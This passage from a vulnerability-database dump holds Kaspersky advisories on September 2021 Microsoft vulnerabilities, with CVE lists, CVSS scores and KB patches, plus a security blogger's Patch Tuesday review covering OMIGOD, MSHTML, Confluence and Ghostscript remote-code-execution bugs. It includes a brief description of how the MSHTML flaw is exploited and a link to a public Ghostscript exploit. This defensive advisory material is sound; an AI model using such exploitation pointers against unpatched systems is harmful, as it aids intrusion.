"cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26435", "CVE-2021-36955", "CVE-2021-36959", "CVE-2021-36960", "CVE-2021-36961", "CVE-2021-36962", "CVE-2021-36963", "CVE-2021-36964", "CVE-2021-36965", "CVE-2021-36968", "CVE-2021-36969", "CVE-2021-38625", "CVE-2021-38626", "CVE-2021-38628", "CVE-2021-38629", "CVE-2021-38630", "CVE-2021-38633", "CVE-2021-38635", "CVE-2021-38636", "CVE-2021-38638", "CVE-2021-38639", "CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40447"], "modified": "2021-09-16T00:00:00", "id": "KLA12289", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12289/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:56:57", "description": "### *Detect date*:\n09/14/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to gain privileges, obtain sensitive information, cause denial of service, bypass security restrictions, execute arbitrary code, spoof user interface.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows Server 2012 R2 (Server Core installation) \nWindows 10 Version 21H1 for x64-based Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 1909 for 32-bit Systems \nWindows Server 2022 \nWindows Server 2022 (Server Core installation) \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server, version 2004 (Server Core installation) \nWindows Server 2016 (Server Core installation) \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows 10 Version 2004 for ARM64-based Systems \nWindows 10 Version 2004 for x64-based Systems \nWindows Server 2016 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows 10 Version 1909 for x64-based Systems \nHEVC Video Extensions \nWindows Server 2012 (Server Core installation) \nWindows 10 Version 2004 for 32-bit Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 8.1 for x64-based systems \nWindows 10 for x64-based Systems \nWindows RT 8.1 \nWindows Server 2012 R2 \nWindows Server 2012 \nWindows 10 Version 1809 for 32-bit Systems \nWindows 10 Version 21H1 for 32-bit Systems \nWindows Server 2019 \nWindows 10 Version 1607 for x64-based Systems \nWindows 8.1 for 32-bit systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows Server 2019 (Server Core installation) \nWindows 10 Version 20H2 for x64-based Systems \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows Server, version 20H2 (Server Core Installation) \nWindows 10 for 32-bit Systems \nWindows 10 Version 20H2 for 32-bit Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-36973](<https://nvd.nist.gov/vuln/detail/CVE-2021-36973>) \n[CVE-2021-38635](<https://nvd.nist.gov/vuln/detail/CVE-2021-38635>) \n[CVE-2021-36962](<https://nvd.nist.gov/vuln/detail/CVE-2021-36962>) \n[CVE-2021-38628](<https://nvd.nist.gov/vuln/detail/CVE-2021-38628>) \n[CVE-2021-36961](<https://nvd.nist.gov/vuln/detail/CVE-2021-36961>) \n[CVE-2021-38638](<https://nvd.nist.gov/vuln/detail/CVE-2021-38638>) \n[CVE-2021-36964](<https://nvd.nist.gov/vuln/detail/CVE-2021-36964>) \n[CVE-2021-38632](<https://nvd.nist.gov/vuln/detail/CVE-2021-38632>) \n[CVE-2021-38644](<https://nvd.nist.gov/vuln/detail/CVE-2021-38644>) \n[CVE-2021-36967](<https://nvd.nist.gov/vuln/detail/CVE-2021-36967>) \n[CVE-2021-36959](<https://nvd.nist.gov/vuln/detail/CVE-2021-36959>) \n[CVE-2021-36960](<https://nvd.nist.gov/vuln/detail/CVE-2021-36960>) \n[CVE-2021-38636](<https://nvd.nist.gov/vuln/detail/CVE-2021-38636>) \n[CVE-2021-38634](<https://nvd.nist.gov/vuln/detail/CVE-2021-38634>) \n[CVE-2021-36972](<https://nvd.nist.gov/vuln/detail/CVE-2021-36972>) \n[CVE-2021-36969](<https://nvd.nist.gov/vuln/detail/CVE-2021-36969>) \n[CVE-2021-26435](<https://nvd.nist.gov/vuln/detail/CVE-2021-26435>) \n[CVE-2021-36955](<https://nvd.nist.gov/vuln/detail/CVE-2021-36955>) \n[CVE-2021-38630](<https://nvd.nist.gov/vuln/detail/CVE-2021-38630>) \n[CVE-2021-38671](<https://nvd.nist.gov/vuln/detail/CVE-2021-38671>) \n[CVE-2021-40447](<https://nvd.nist.gov/vuln/detail/CVE-2021-40447>) \n[CVE-2021-36974](<https://nvd.nist.gov/vuln/detail/CVE-2021-36974>) \n[CVE-2021-38629](<https://nvd.nist.gov/vuln/detail/CVE-2021-38629>) \n[CVE-2021-38639](<https://nvd.nist.gov/vuln/detail/CVE-2021-38639>) \n[CVE-2021-36966](<https://nvd.nist.gov/vuln/detail/CVE-2021-36966>) \n[CVE-2021-38667](<https://nvd.nist.gov/vuln/detail/CVE-2021-38667>) \n[CVE-2021-36965](<https://nvd.nist.gov/vuln/detail/CVE-2021-36965>) \n[CVE-2021-36963](<https://nvd.nist.gov/vuln/detail/CVE-2021-36963>) \n[CVE-2021-38624](<https://nvd.nist.gov/vuln/detail/CVE-2021-38624>) \n[CVE-2021-38661](<https://nvd.nist.gov/vuln/detail/CVE-2021-38661>) \n[CVE-2021-36954](<https://nvd.nist.gov/vuln/detail/CVE-2021-36954>) \n[CVE-2021-38633](<https://nvd.nist.gov/vuln/detail/CVE-2021-38633>) \n[CVE-2021-36975](<https://nvd.nist.gov/vuln/detail/CVE-2021-36975>) \n[CVE-2021-38637](<https://nvd.nist.gov/vuln/detail/CVE-2021-38637>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *KB list*:\n[5005613](<http://support.microsoft.com/kb/5005613>) \n[5005568](<http://support.microsoft.com/kb/5005568>) \n[5005575](<http://support.microsoft.com/kb/5005575>) \n[5005627](<http://support.microsoft.com/kb/5005627>) \n[5005565](<http://support.microsoft.com/kb/5005565>) \n[5005623](<http://support.microsoft.com/kb/5005623>) \n[5005573](<http://support.microsoft.com/kb/5005573>) \n[5005569](<http://support.microsoft.com/kb/5005569>) \n[5005566](<http://support.microsoft.com/kb/5005566>) \n[5005607](<http://support.microsoft.com/kb/5005607>) \n[5006699](<http://support.microsoft.com/kb/5006699>) \n[5006672](<http://support.microsoft.com/kb/5006672>) \n[5006674](<http://support.microsoft.com/kb/5006674>) \n[5006670](<http://support.microsoft.com/kb/5006670>) \n[5006667](<http://support.microsoft.com/kb/5006667>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T00:00:00", "type": "kaspersky", "title": "KLA12290 Multiple vulnerabilities in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26435", "CVE-2021-36954", "CVE-2021-36955", "CVE-2021-36959", "CVE-2021-36960", "CVE-2021-36961", "CVE-2021-36962", "CVE-2021-36963", "CVE-2021-36964", "CVE-2021-36965", "CVE-2021-36966", "CVE-2021-36967", "CVE-2021-36969", "CVE-2021-36972", "CVE-2021-36973", "CVE-2021-36974", "CVE-2021-36975", "CVE-2021-38624", "CVE-2021-38628", "CVE-2021-38629", "CVE-2021-38630", "CVE-2021-38632", "CVE-2021-38633", "CVE-2021-38634", "CVE-2021-38635", "CVE-2021-38636", "CVE-2021-38637", "CVE-2021-38638", "CVE-2021-38639", "CVE-2021-38644", "CVE-2021-38661", "CVE-2021-38667", "CVE-2021-38671", "CVE-2021-40447"], "modified": "2021-10-14T00:00:00", "id": "KLA12290", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12290/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-08T15:37:45", "description": "### *Detect date*:\n09/07/2021\n\n### *Severity*:\nHigh\n\n### *Description*:\nA remote code execution vulnerability was found in Microsoft Producy (Extended Security Update). Malicious users can exploit this vulnerability to execute arbitrary code.\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:\n\n### *Affected products*:\nWindows Server 2012 R2 (Server Core installation) \nWindows 10 Version 21H1 for x64-based Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 1909 for 32-bit Systems \nWindows Server 2022 \nWindows Server 2022 (Server Core installation) \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server, version 2004 (Server Core installation) \nWindows Server 2016 (Server Core installation) \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows 10 Version 2004 for ARM64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2016 \nWindows 10 Version 2004 for x64-based Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows 10 Version 2004 for 32-bit Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 8.1 for x64-based systems \nWindows RT 8.1 \nWindows 10 for x64-based Systems \nWindows Server 2012 R2 \nWindows Server 2012 \nWindows 10 Version 1809 for 32-bit Systems \nWindows 10 Version 21H1 for 32-bit Systems \nWindows Server 2019 \nWindows 10 Version 1607 for x64-based Systems \nWindows 8.1 for 32-bit systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows Server 2019 (Server Core installation) \nWindows 10 Version 20H2 for x64-based Systems \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows Server, version 20H2 (Server Core Installation) \nWindows 10 for 32-bit Systems \nWindows 10 Version 20H2 for 32-bit Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-40444](<https://nvd.nist.gov/vuln/detail/CVE-2021-40444>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2021-40444](<https://vulners.com/cve/CVE-2021-40444>)6.8High\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[5005563](<http://support.microsoft.com/kb/5005563>) \n[5005633](<http://support.microsoft.com/kb/5005633>) \n[5005606](<http://support.microsoft.com/kb/5005606>) \n[5019958](<http://support.microsoft.com/kb/5019958>)", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-07T00:00:00", "type": "kaspersky", "title": "KLA12278 RCE vulnerability in Microsoft Products (ESU)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2023-06-05T00:00:00", "id": "KLA12278", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12278/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-08T15:37:50", "description": "### *Detect date*:\n09/07/2021\n\n### *Severity*:\nHigh\n\n### *Description*:\nA remote code execution vulnerability was found in Microsoft Windows. Malicious users can exploit this vulnerability to execute arbitrary code.\n\n### *Exploitation*:\nThe following public exploits exists for this vulnerability:\n\n### *Affected products*:\nWindows Server 2012 R2 (Server Core installation) \nWindows 10 Version 21H1 for x64-based Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 1909 for 32-bit Systems \nWindows Server 2022 \nWindows Server 2022 (Server Core installation) \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server, version 2004 (Server Core installation) \nWindows Server 2016 (Server Core installation) \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows 10 Version 2004 for ARM64-based Systems \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2016 \nWindows 10 Version 2004 for x64-based Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows 10 Version 2004 for 32-bit Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 8.1 for x64-based systems \nWindows RT 8.1 \nWindows 10 for x64-based Systems \nWindows Server 2012 R2 \nWindows Server 2012 \nWindows 10 Version 1809 for 32-bit Systems \nWindows 10 Version 21H1 for 32-bit Systems \nWindows Server 2019 \nWindows 10 Version 1607 for x64-based Systems \nWindows 8.1 for 32-bit systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows Server 2019 (Server Core installation) \nWindows 10 Version 20H2 for x64-based Systems \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows Server, version 20H2 (Server Core Installation) \nWindows 10 for 32-bit Systems \nWindows 10 Version 20H2 for 32-bit Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-40444](<https://nvd.nist.gov/vuln/detail/CVE-2021-40444>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *CVE-IDS*:\n[CVE-2021-40444](<https://vulners.com/cve/CVE-2021-40444>)6.8High\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[5005613](<http://support.microsoft.com/kb/5005613>) \n[5005568](<http://support.microsoft.com/kb/5005568>) \n[5005575](<http://support.microsoft.com/kb/5005575>) \n[5005627](<http://support.microsoft.com/kb/5005627>) \n[5005563](<http://support.microsoft.com/kb/5005563>) \n[5005565](<http://support.microsoft.com/kb/5005565>) \n[5005623](<http://support.microsoft.com/kb/5005623>) \n[5005573](<http://support.microsoft.com/kb/5005573>) \n[5005569](<http://support.microsoft.com/kb/5005569>) \n[5005566](<http://support.microsoft.com/kb/5005566>)", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-07T00:00:00", "type": "kaspersky", "title": "KLA12277 RCE vulnerability in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2023-06-05T00:00:00", "id": "KLA12277", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12277/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-23T16:30:33", "description": "### *Detect date*:\n09/14/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft System Center. Malicious users can exploit these vulnerabilities to execute arbitrary code, cause denial of service, gain privileges.\n\n### *Affected products*:\nAzure Diagnostics (LAD) \nAzure Security Center \nSystem Center Operations Manager (SCOM) \nContainer Monitoring Solution \nAzure Open Management Infrastructure \nAzure Stack Hub \nAzure Automation State Configuration, DSC Extension \nAzure Sentinel \nLog Analytics Agent \nAzure Automation Update Management\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-38647](<https://nvd.nist.gov/vuln/detail/CVE-2021-38647>) \n[CVE-2021-38648](<https://nvd.nist.gov/vuln/detail/CVE-2021-38648>) \n[CVE-2021-38649](<https://nvd.nist.gov/vuln/detail/CVE-2021-38649>) \n[CVE-2021-38645](<https://nvd.nist.gov/vuln/detail/CVE-2021-38645>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft System Center Operations Manager](<https://threats.kaspersky.com/en/product/Microsoft-System-Center-Operations-Manager/>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T00:00:00", "type": "kaspersky", "title": "KLA12297 Multiple vulnerabilities in Microsoft System Center", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649"], "modified": "2021-09-30T00:00:00", "id": "KLA12297", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12297/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-23T16:30:40", "description": "### *Detect date*:\n09/14/2021\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Azure. Malicious users can exploit these vulnerabilities to gain privileges, obtain sensitive information.\n\n### *Affected products*:\nAccessibility Insights for Android \nAzure Open Management Infrastructure \nAzure Sphere\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2021-38645](<https://nvd.nist.gov/vuln/detail/CVE-2021-38645>) \n[CVE-2021-38649](<https://nvd.nist.gov/vuln/detail/CVE-2021-38649>) \n[CVE-2021-40448](<https://nvd.nist.gov/vuln/detail/CVE-2021-40448>) \n[CVE-2021-38647](<https://nvd.nist.gov/vuln/detail/CVE-2021-38647>) \n[CVE-2021-38648](<https://nvd.nist.gov/vuln/detail/CVE-2021-38648>) \n[CVE-2021-36956](<https://nvd.nist.gov/vuln/detail/CVE-2021-36956>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Access](<https://threats.kaspersky.com/en/product/Microsoft-Access/>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T00:00:00", "type": "kaspersky", "title": "KLA12286 Mutliple vulnerabilities in Microsoft Azure", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36956", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40448"], "modified": "2021-09-16T00:00:00", "id": "KLA12286", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12286/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "avleonov": [{"lastseen": "2021-11-26T18:43:30", "description": "Hello everyone! This time, let&#x27;s talk about recent vulnerabilities. I&#x27;ll start with Microsoft Patch Tuesday for September 2021. I created a report using my Vulristics tool. You can see [the full report here](<https://avleonov.com/vulristics_reports/ms_patch_tuesday_september2021_report_avleonov_comments.html>).\n\nThe most interesting thing about the September Patch Tuesday is that the top 3 VM vendors ignored almost all RCEs in their reviews. However, there were interesting RCEs in the Office products. And what is most unforgivable is that they did not mention CVE-2021-38647 RCE in OMI - Open Management Infrastructure. Only ZDI wrote about this.\n\n## Microsoft Patch Tuesday September 2021\n\n### OMIGOD\n\n[Dubbed \u201cOMIGOD\u201d by researchers at Wiz.io](<https://www.infosecurity-magazine.com/news/microsoft-fixes-omigod-mshtml/>), the bugs could enable a remote attacker to gain root access to Linux virtual machines running on Azure. \u201cWe conservatively estimate that thousands of Azure customers and millions of endpoints are affected. In a small sample of Azure tenants we analyzed, over 65% were unknowingly at risk,\u201d the firm warned. \n\nSo, OMIGOD RCEs and EOPs with detected exploitation in the wild are in the Vulristics TOP. What else?\n\n### Chrome/Chromium/Edge RCE\n\nAn exploitation in the wild has been seen for Chrome/Chromium/Edge vulnerability CVE-2021-30632. Still no comments from the VM vendors, only from ZDI.\n\n### WLAN AutoConfig RCE\n\nOnly Qualys and ZDI mentioned CVE-2021-36965 Remote Code Execution in Windows WLAN AutoConfig Service. &quot;This would be highly useful in a coffee shop scenario where multiple people are using an unsecured WiFi network.&quot;\n\nAlso note several EOPs in Windows Kernel, Windows Common Log File System Driver and Windows Print Spooler.\n\n### MSHTML RCE\n\nBut of course, people were mostly waiting for fixes for a vulnerability that wasn&#x27;t released on Patch Tuesday, but a week ago. However, the updates only became available on September 14th. It is CVE-2021-40444 Microsoft MSHTML Remote Code Execution Vulnerability. &quot;\u0410 critical zero-day RCE vulnerability in Microsoft\u2019s MSHTML (Trident) engine that was exploited in the wild in limited, targeted attacks&quot;. &quot;To exploit this vulnerability, an attacker would need to create a specially crafted Microsoft Office document containing a malicious ActiveX control&quot;. Well, people are saying that ActiveX is not being used in new exploits for this vulnerability. This is serious, consider this in your anti-phishing programs and, of course, install patches.\n\n## Non-Microsoft vulnerabilities\n\nI would also like to say a few words about [other recent non-Microsoft vulnerabilities](<https://avleonov.com/vulristics_reports/september_2021_other_report_avleonov_comments.html>).\n\n### Confluence RCE\n\nI would like to mention the massively exploited CVE-2021-26084 Confluence RCE. A week passed between the release of the newsletter and the public exploit. If your organization has Confluence, keep an eye on it and never make it available at the perimeter of your network.\n\n### Ghostscript RCE\n\nAlso, the &quot;[Ghostscript provider Artifex Software released a security advisory](<https://www.jpcert.or.jp/english/at/2021/at210039.html>) regarding a vulnerability (CVE-2021-3781) that allows arbitrary command execution in Ghostscript. On a server running Ghostscript, an attacker may execute arbitrary commands by processing content that exploits this vulnerability&quot;. There is a [public exploit](<https://github.com/duc-nt/RCE-0-day-for-GhostScript-9.50>) for this vulnerability. Ask your developers if they use it to process SVG files.\n\n### Pegasus FORCEDENTRY macOS RCE\n\nAnd finally the RCE CVE-2021-30860 FORCEDENTRY vulnerability that was used in Pegasus spyware. The exploit that was spotted in the wild relies on malicious PDF files. The vulnerability became famous mainly because of iPhone attacks, but t[here are also patches for macOS Big Sur 11.6 and 2021-005 Catalina](<https://nakedsecurity.sophos.com/2021/09/14/apple-products-vulnerable-to-forcedentry-zero-day-attack-patch-now/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-18T23:22:00", "type": "avleonov", "title": "Security News: Microsoft Patch Tuesday September 2021, OMIGOD, MSHTML RCE, Confluence RCE, Ghostscript RCE, FORCEDENTRY Pegasus", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-30632", "CVE-2021-30860", "CVE-2021-36965", "CVE-2021-3781", "CVE-2021-38647", "CVE-2021-40444"], "modified": "2021-09-18T23:22:00", "id": "AVLEONOV:5945665DFA613F7707360C10CED8C916", "href": "https://avleonov.com/2021/09/19/security-news-microsoft-patch-tuesday-september-2021-omigod-mshtml-rce-confluence-rce-ghostscript-rce-forcedentry-pegasus/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-11T01:56:16", "description": "Hello everyone! In this episode, I want to talk about the Positive Hack Days 11 conference, which took place on May 18 and 19 in Moscow. As usual, I want to express my personal opinion about this event.\n\nAlternative video link (for Russia): <https://vk.com/video-149273431_456239091>\n\nAs I did last year, I want to start talking about this conference with a few words about the sanctions. US sanctions against Positive Technologies, the organizers of Positive Hack Days, were introduced a year ago. At that time it seemed very serious and extraordinary. But today, when our country has become the most sanctioned country in the world, those sanctions 